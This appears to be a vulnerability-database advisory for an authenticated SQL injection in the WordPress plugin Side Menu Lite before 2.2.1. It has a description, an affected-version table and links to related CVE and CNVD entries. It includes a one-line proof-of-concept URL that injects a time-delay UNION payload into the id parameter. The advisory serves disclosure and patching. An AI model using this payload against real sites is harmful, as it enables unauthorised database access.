Lucene search
Pang0lin @webray.com.cn incWPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CDHistoryJun 28, 2021 - 12:00 a.m.
Side Menu Lite < 2.2.1 - Authenticated SQL Injection
2021-06-2800:00:00
pang0lin @webray.com.cn inc
wpscan.com
7
The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.
PoC
http://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab;=add-new&act;=duplicate&id;=0 union select 1,2,sleep(5) Visiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.
| CPE | Name | Operator | Version |
|---|---|---|---|
| side-menu-lite | lt | 2.2.1 |
Related
wpexploit
wpexploit
Side Menu Lite < 2.2.1 - Authenticated SQL Injection
2021-06-28 00:00:00
cve
cve
CVE-2021-24521
2021-08-09 10:15:00
prion
prion
Sql injection
2021-08-09 10:15:00
cnvd
cnvd
WordPress SQL Injection Vulnerability (CNVD-2021-61432)
2021-08-11 00:00:00
Related for WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD